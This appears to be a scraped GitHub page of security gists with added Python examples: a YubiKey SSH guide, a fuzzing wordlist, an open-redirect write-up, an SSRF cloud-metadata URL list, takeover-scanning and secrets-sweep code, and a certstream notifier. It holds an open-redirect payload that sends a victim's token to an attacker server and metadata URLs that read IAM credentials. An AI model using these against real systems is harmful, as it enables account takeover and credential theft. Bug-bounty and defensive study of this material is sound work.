Bharath 0xbharath

👨‍💻 Automating Appsec!
@Kranzes
Kranzes / guide.md
Last active June 23, 2024 09:40
SSH Resident Key Guide

Initial checks

Start by checking that there aren't any previous ssh keys inside the FIDO2 authenticator of your YubiKey. You can check if they exist by running the command below:

nix shell nixpkgs#yubikey-manager -c ykman fido credentials list

If the command above prints a line mentioning "ssh" or "openssh", a key has already been generated and stored on your YubiKey.

Evaluating additional authentication factors

Before generating a new ssh key to store on your YubiKey, decide which additional authentication factors you want the key to require. The table below lists the available factors and the corresponding command:
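The two steps above, as an added Python example that is not part of Kranzes' guide: a check of `ykman fido credentials list` output for an existing OpenSSH credential, and a builder for the `ssh-keygen` argument list that maps the extra factors you choose (touch only, PIN only, PIN and touch, or neither) onto the `-O` options OpenSSH uses for resident FIDO2 keys (`resident`, `verify-required`, `no-touch-required`, `application=`, `user=`). The sample ykman output is constructed for the example and may not match your ykman version's exact layout; the factor names in `FACTOR_OPTIONS` are this example's own vocabulary, not the guide's.

```python
import subprocess
from typing import List

# Constructed sample of what `ykman fido credentials list` might print when an
# OpenSSH resident key is present (layout is an assumption, not ykman's spec).
SAMPLE_YKMAN_OUTPUT = """\
RP ID: ssh:  Username: openssh  Credential ID: 1a2b3c4d5e6f
"""


def has_openssh_credential(ykman_output: str) -> bool:
    """True if any credential line mentions ssh (OpenSSH uses the relying-party
    ID 'ssh:' and the default user name 'openssh' for resident keys)."""
    return any("ssh" in line.lower() for line in ykman_output.splitlines())


# Extra factors -> ssh-keygen -O options. Touch is required by default, so
# "touch" adds nothing; "verify-required" makes the PIN mandatory at every use;
# "no-touch-required" drops the touch requirement (the authenticator must allow it).
FACTOR_OPTIONS = {
    "touch": [],
    "pin": ["-O", "verify-required", "-O", "no-touch-required"],
    "pin+touch": ["-O", "verify-required"],
    "none": ["-O", "no-touch-required"],
}


def sk_keygen_argv(factors: str, app_label: str, out_path: str,
                   user: str = "openssh") -> List[str]:
    """Build the ssh-keygen command for an ed25519-sk resident key.

    app_label becomes the relying-party ID 'ssh:<label>' so several resident keys
    can live side by side on one authenticator; user= tags the key for `ssh-keygen -K`.
    """
    if factors not in FACTOR_OPTIONS:
        raise ValueError(f"unknown factor set {factors!r}; choose one of {sorted(FACTOR_OPTIONS)}")
    argv = ["ssh-keygen", "-t", "ed25519-sk", "-O", "resident",
            "-O", f"application=ssh:{app_label}", "-O", f"user={user}"]
    argv += FACTOR_OPTIONS[factors]
    argv += ["-f", out_path]
    return argv


if __name__ == "__main__":
    try:
        listing = subprocess.run(["ykman", "fido", "credentials", "list"],
                                 capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        listing = SAMPLE_YKMAN_OUTPUT  # ykman not installed: demonstrate on the sample
    if has_openssh_credential(listing):
        print("an OpenSSH resident credential already exists on this authenticator")
    else:
        print("no OpenSSH credential found; would run:",
              " ".join(sk_keygen_argv("pin+touch", "github", "~/.ssh/id_ed25519_sk")))
```

Run the printed command yourself once you are happy with the factor choice; `ssh-keygen -K` later retrieves the resident key handle on another machine.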

@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active July 3, 2024 14:04
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost all I needed, in two different bug bounty programs, to get access to user accounts. In one case a JWT was leaked; in the other, the CSRF token. The issue was much the same in both: client-side code that neither validated nor URI-encoded user input, which let me send sensitive information to my server through an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
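An added Python example, not the write-up's own code, of the URL construction the steps describe: the value from `?code=` is concatenated into the request path unvalidated and unencoded, so a value containing `../redirect?url=...` makes the request land on the open-redirect endpoint instead of `/verify/`. The hardened form validates the code against an assumed pattern and percent-encodes it as a single path segment. `example.com`, `/verify/`, `/redirect` and `myserver.com` are taken from the write-up; the shape of a legitimate code is an assumption. The example shows only where the request is routed, not how the header value reaches the attacker, which the excerpt above does not spell out.

```python
import posixpath
import re
from typing import Tuple
from urllib.parse import quote, urlsplit, urlunsplit

VERIFY_BASE = "https://example.com/verify/"
CODE_RE = re.compile(r"[A-Za-z0-9_-]{8,128}")  # assumed shape of a genuine code
ATTACK_CODE = "../redirect?url=https://myserver.com/attack.php"  # constructed payload


def verify_url_unsafe(code: str) -> str:
    """The pattern described in the write-up: raw concatenation of user input."""
    return VERIFY_BASE + code


def verify_url_encoded(code: str) -> str:
    """Encoding alone: '/', '?' and '=' become %2F, %3F, %3D, so the value can
    no longer introduce new path segments or a query string."""
    return VERIFY_BASE + quote(code, safe="")


def is_well_formed_code(code: str) -> bool:
    """Validation: reject anything that is not the expected token format."""
    return CODE_RE.fullmatch(code) is not None


def verify_url_safe(code: str) -> str:
    """Hardened form: validate first, then encode."""
    if not is_well_formed_code(code):
        raise ValueError("malformed code")
    return verify_url_encoded(code)


def as_sent_by_browser(url: str) -> str:
    """Approximate the browser's URL normalisation before the request is sent:
    '.' and '..' path segments are resolved, so /verify/../redirect becomes /redirect."""
    p = urlsplit(url)
    path = posixpath.normpath(p.path)
    if p.path.endswith("/") and not path.endswith("/"):
        path += "/"
    return urlunsplit((p.scheme, p.netloc, path, p.query, p.fragment))


def request_target(url: str) -> Tuple[str, str]:
    """(path, query) of the request as the server would see it."""
    p = urlsplit(as_sent_by_browser(url))
    return p.path, p.query


if __name__ == "__main__":
    print("unsafe  ->", request_target(verify_url_unsafe(ATTACK_CODE)))
    print("encoded ->", request_target(verify_url_encoded(ATTACK_CODE)))
    print("valid?  ->", is_well_formed_code(ATTACK_CODE))
```

Validation and encoding are both worth having: encoding keeps the input inside the intended path segment, and validation rejects the payload before it is ever used.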
@bvaughn
bvaughn / profiling-a-chrome-extension.md
Last active February 21, 2024 05:46
Profiling a custom Chrome extension

Chrome's profiler (the "Performance" tab) is very useful for measuring JavaScript performance, but what if you want to measure the performance of a custom extension?

For example, what if I would like to profile the following interaction:

[Image: The interaction we want to profile]

@jhaddix
jhaddix / cloud_metadata.txt
Last active June 10, 2024 09:08 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
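The defensive counterpart to the dictionary above, as an added Python example that is not part of the gist: a check an SSRF filter can run on a user-supplied URL before fetching it, which recognises the metadata address in the spellings naive filters miss (decimal `2852039166`, hex `0xa9fea9fe`, octal `0251.0376.0251.0376`, the short form `169.254.43518`, the IPv4-mapped `[::ffff:169.254.169.254]`) as well as the AWS IMDS IPv6 endpoint `fd00:ec2::254`. The set of networks in `METADATA_NETS` is this example's assumption; the test URLs are constructed.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

# Assumed scope: the IPv4 link-local block the major clouds serve metadata from,
# plus the AWS IMDS IPv6 endpoint. Extend for providers on other addresses.
METADATA_NETS = (
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("fd00:ec2::254/128"),
)


def _int_part(part: str) -> int:
    """Parse one IPv4 component like inet_aton: 0x.. hex, leading 0 octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)


def _legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Accept the 1- to 4-component numeric forms that libc resolvers accept.
    The last component fills the remaining bytes (169.254.43518 == 169.254.169.254)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_int_part(p) for p in parts]
    except ValueError:
        return None                      # not numeric at all: a DNS name
    value = 0
    for n in nums[:-1]:
        if not 0 <= n <= 255:
            return None
        value = (value << 8) | n
    last_bits = 8 * (5 - len(parts))
    if not 0 <= nums[-1] < (1 << last_bits):
        return None
    return ipaddress.IPv4Address((value << last_bits) | nums[-1])


def is_metadata_target(url: str) -> bool:
    """True if the URL's host is a literal address inside METADATA_NETS.

    A host name returns False here; resolve it and run the resolved address
    through the same check (and pin the result, to blunt DNS rebinding).
    """
    host = urlsplit(url).hostname        # lowercased; brackets and port removed
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)  # dotted quad or IPv6 literal
    except ValueError:
        addr = _legacy_ipv4(host)          # alternative numeric spellings
    if addr is None:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped            # [::ffff:169.254.169.254]
    return any(addr in net for net in METADATA_NETS)


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/", "http://2852039166/latest/",
              "http://0xa9fea9fe/latest/", "http://[fd00:ec2::254]/latest/meta-data/",
              "http://example.com/"):
        print(is_metadata_target(u), u)
```

When testing, the same list of spellings is what you feed the target's SSRF sink; when defending, the check runs on the resolved address, not on the string the user typed.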
@dboyd13
dboyd13 / aws-certified-security-specialist-study-notes.txt
Last active September 15, 2023 03:38
aws-certified-security-specialist-study-notes
AWS - Certified Security Specialty
Notes taken in Mar-2018, from acloud.guru and AWS FAQ
[ASCII-art banner for the first section, truncated]
@haccer
haccer / scanio.sh
Last active July 2, 2024 14:16
PoC script to mass-locate vulnerable subdomains using results from Rapid7's Project Sonar
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
# Progress spinner: redraws the message in $1 with a rotating glyph until killed.
function ech() {
    spinner=( "|" "/" "-" "\\" )
    while true; do
        for i in "${spinner[@]}"; do
            echo -ne "\r[$i] $1"
            sleep 0.1
        done
    done
}
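The selection step behind a script like this, as an added Python example that is not haccer's code: walk Rapid7 Project Sonar forward-DNS records (one JSON object per line, with `name`, `type` and `value` fields), keep CNAMEs whose owner is in scope and whose target sits on a third-party service where unclaimed names are a classic subdomain-takeover lead, and group them by service. The suffix list is this example's assumption and a hit is only a lead to verify by hand (does the target name still resolve, is the resource claimable); the sample records are constructed.

```python
import json
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Assumed list: CNAME targets where a dangling record is worth a manual check.
TAKEOVER_LEAD_SUFFIXES = (
    ".s3.amazonaws.com",
    ".github.io",
    ".herokuapp.com",
    ".azurewebsites.net",
)

# Constructed sample in the Sonar fdns line format (real dumps are gzip'd and huge).
SAMPLE_SONAR = """\
{"timestamp":"1492468299","name":"assets.example.com","type":"cname","value":"example-assets.s3.amazonaws.com"}
{"timestamp":"1492468299","name":"blog.example.com","type":"cname","value":"example.github.io"}
{"timestamp":"1492468299","name":"www.example.com","type":"a","value":"93.184.216.34"}
{"timestamp":"1492468299","name":"app.other.net","type":"cname","value":"other-app.herokuapp.com"}
{"timestamp":"1492468299","name":"mail.example.com","type":"cname","value":"example-com.mail.protection.outlook.com"}
"""


def _in_scope(name: str, scope: Tuple[str, ...]) -> bool:
    return any(name == d or name.endswith("." + d) for d in scope)


def cname_leads(sonar_lines: Iterable[str],
                scope: Tuple[str, ...]) -> Dict[str, List[Tuple[str, str]]]:
    """Return {service suffix: [(owner name, cname target), ...]} for in-scope
    CNAMEs pointing at a lead suffix. Damaged lines are skipped, not fatal."""
    leads: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for raw in sonar_lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if rec.get("type") != "cname":
            continue
        name = str(rec.get("name", "")).lower().rstrip(".")
        value = str(rec.get("value", "")).lower().rstrip(".")
        if not _in_scope(name, scope):
            continue
        for suffix in TAKEOVER_LEAD_SUFFIXES:
            if value.endswith(suffix):
                leads[suffix].append((name, value))
                break
    return dict(leads)


if __name__ == "__main__":
    for suffix, pairs in cname_leads(SAMPLE_SONAR.splitlines(), ("example.com",)).items():
        for owner, target in pairs:
            print(f"{suffix:22} {owner} -> {target}")
```

For a real run, stream `zcat fdns_cname.json.gz` into `cname_leads` rather than loading the file; the function only needs one line at a time.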
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active June 23, 2024 20:29
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues: organization members and their open source projects can accidentally expose information that can be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
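One of the local tests worth running over the cloned tree, as an added Python example that is neither EdOverflow's nor GitHubCloner's code: a small secrets sweep with a few well-known token shapes (AWS access key IDs, GitHub personal access tokens, PEM private-key headers), skipping `.git` and vendored directories, plus a history pass over `git log -p --all`, since credentials removed from HEAD usually survive in earlier commits. The pattern set and skip list are this example's choices; the sample files are constructed (the AWS key is Amazon's documented example value).

```python
import os
import re
import subprocess
from typing import Dict, List, Tuple

# A starting set of high-confidence patterns; extend with your target's own token formats.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}
SKIP_DIRS = {".git", "node_modules", "vendor", "dist"}

# Constructed sample of a cloned repository (path -> contents).
SAMPLE_FILES = {
    "config/settings.py": 'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\nDEBUG = True\n',
    "deploy/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA...\n",
    "README.md": "Set GH_TOKEN to ghp_" + "x" * 36 + " before running the release script.\n",
    "src/main.py": "print('hello')\n",
}

Hit = Tuple[str, int, str, str]  # (path, line number, pattern name, matched text)


def scan_text(text: str, path: str = "<text>") -> List[Hit]:
    hits: List[Hit] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            for m in rx.finditer(line):
                hits.append((path, lineno, name, m.group(0)))
    return hits


def scan_files(files: Dict[str, str]) -> List[Hit]:
    """Scan an in-memory {path: contents} mapping (what scan_tree builds from disk)."""
    hits: List[Hit] = []
    for path in sorted(files):
        hits.extend(scan_text(files[path], path))
    return hits


def scan_tree(root: str) -> List[Hit]:
    """Scan the working trees under root (e.g. GitHubCloner's output directory)."""
    files: Dict[str, str] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
            except OSError:
                continue
    return scan_files(files)


def scan_history(repo: str) -> List[Hit]:
    """Secrets deleted from HEAD often remain in history: scan every commit's diff."""
    log = subprocess.run(["git", "-C", repo, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return scan_text(log, path=f"{repo}:history")


if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print("%s:%d %s %s" % hit)
```

Point `scan_tree` at the GitHubCloner output directory and `scan_history` at each repository inside it; review hits by hand, since example and test fixtures produce false positives.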
@Fitblip
Fitblip / slack_notification.py
Created June 24, 2017 06:17
An example for certstream to send a slack notification.
import os

import certstream
import json
import requests

# Set WEBHOOK_URL to the one provided by Slack when you create the webhook at https://my.slack.com/services/new/incoming-webhook/
WEBHOOK_URL = os.environ["SLACK_WEBHOOK_URL"]
NEEDLE = "coinbase"
# Search for domains with a keyword in them and write the corresponding certificate to a file
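The matching and notification logic the gist is building towards, as an added Python example that is not Fitblip's code: a pure function that extracts the keyword hits from a certstream `certificate_update` message (ignoring heartbeats and de-duplicating wildcard entries), a Slack incoming-webhook payload builder, and a callback that wires them together. The certstream message layout used (`message_type`, `data.leaf_cert.all_domains`) is the one the certstream client delivers; the webhook is posted with `urllib` instead of the gist's `requests` so the example has no third-party dependency, and the sample message is constructed.

```python
import json
import os
import urllib.request
from typing import Callable, List

# Constructed sample messages in the shape certstream hands to a callback.
SAMPLE_CERT_MESSAGE = {
    "message_type": "certificate_update",
    "data": {"leaf_cert": {"all_domains": [
        "login-coinbase.example", "*.login-coinbase.example", "cdn.example.net",
    ]}},
}
SAMPLE_HEARTBEAT = {"message_type": "heartbeat"}


def matching_domains(message: dict, needle: str) -> List[str]:
    """Domains in the certificate containing the keyword, lower-cased, with
    wildcard prefixes stripped and duplicates removed. Heartbeats yield nothing."""
    if message.get("message_type") != "certificate_update":
        return []
    domains = message.get("data", {}).get("leaf_cert", {}).get("all_domains", [])
    needle = needle.lower()
    return sorted({d.lower().lstrip("*.") for d in domains if needle in d.lower()})


def slack_payload(needle: str, domains: List[str]) -> dict:
    """Minimal incoming-webhook body: Slack only requires a 'text' field."""
    return {"text": f"certstream hit for '{needle}': " + ", ".join(domains)}


def post_to_slack(webhook_url: str, payload: dict) -> int:
    req = urllib.request.Request(webhook_url, data=json.dumps(payload).encode(),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def make_callback(needle: str, webhook_url: str) -> Callable[[dict, object], None]:
    """certstream calls back with (message, context); notify only on hits."""
    def callback(message: dict, context: object) -> None:
        hits = matching_domains(message, needle)
        if hits:
            post_to_slack(webhook_url, slack_payload(needle, hits))
    return callback


if __name__ == "__main__":
    import certstream  # only needed for the live stream
    certstream.listen_for_events(
        make_callback("coinbase", os.environ["SLACK_WEBHOOK_URL"]),
        url="wss://certstream.calidog.io/",
    )
```

Keep the keyword match loose on purpose: lookalike domains (`c0inbase`, `coinbase-login`) are the point of watching CT logs, and a second filter on the Slack side is cheaper than missed alerts.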